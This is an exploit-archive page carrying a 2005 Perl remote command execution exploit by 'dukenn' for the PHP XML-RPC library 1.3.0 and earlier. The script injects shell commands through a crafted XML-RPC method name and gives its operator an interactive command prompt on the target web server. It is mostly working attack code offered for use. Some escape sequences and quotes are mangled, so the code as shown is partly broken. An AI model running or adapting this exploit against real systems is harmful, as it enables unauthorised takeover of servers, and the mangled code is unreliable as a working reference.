[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : xmlrpc.php Library <= 1.3.0 Remote Command Execute Exploit (2)
# Published : 2005-07-04
# Author : dukenn
# Previous Title : XOOPS <= 2.0.11 xmlrpc.php SQL Injection Exploit
# Next Title : xmlrpc.php Library <= 1.3.0 Remote Command Execute Exploit (3)


#-------------------------------------------------------#
#                     /|                                #       
#                    | |                                #      
#                    | |                                #      
#       /   ________| |___                             #       
#      /    _______   __/                             #
#     /    |_____  | | _       _  _     _  ()___      #      
#    /  /    ___  | |<_>  /  |  |  | ||  || | | |   #       
#   /  /__  |    || | _  /__ |_ |  | ||_/ || | |_|   #       
#  /  ______     | || || |   / |  |  | ||  || |   |   #       
# /  /          | || || |  /  |_ |_ |_||  || | _|   #       
# _/       |_/  | || || | ___ _  _                    #       
#           | |   | || /| |  | |  | ||/|               #       
#            |    ||/  |  | |_ |_||  |               #       
#                            | |  | ||  |               #       
#                            | |_ | ||  |               #       
#                                                       #
#         Original advisory by http://gulftech.org/     #
#         Exploit coded by dukenn (http://asteam.org)   #
#                                                       # 
#-------------------------------------------------------

#!/usr/bin/perl

use IO::Socket;

print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $xml = $ARGV[1];
 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterrorn";
 while (1) {
    print '['.$host.']# ';
    $cmd = <STDIN>;
    chop($cmd);
    last if ($cmd eq 'exit');
    $xmldata = "<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>";
    print $sock "POST ".$xml." HTTP/1.1n";
    print $sock "Host: ".$host."n";
    print $sock "Content-Type: text/xmln";
    print $sock "Content-Length:".length($xmldata)."nn".$xmldata;
    $good=0;
    while ($ans = <$sock>)
       {
        if ($good == 1) { print "$ans"; }
        last if ($ans =~ /^_end_/);
        if ($ans =~ /^_begin_/) { $good = 1; }
       }
      if ($good==0) {print "Exploit Failedn";exit();}
   }
 }
else {
 print "Usage: perl xml.pl [host] [path_to_xmlrpc]nn";
 print "Example: perl xml.pl target.com /script/xmlrpc.phpn";
exit;
}

# www.Syue.com [2005-07-04]